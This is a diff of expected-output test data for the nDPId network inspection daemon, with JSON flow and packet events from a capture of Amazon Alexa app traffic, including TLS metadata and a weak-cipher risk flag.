+01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="} 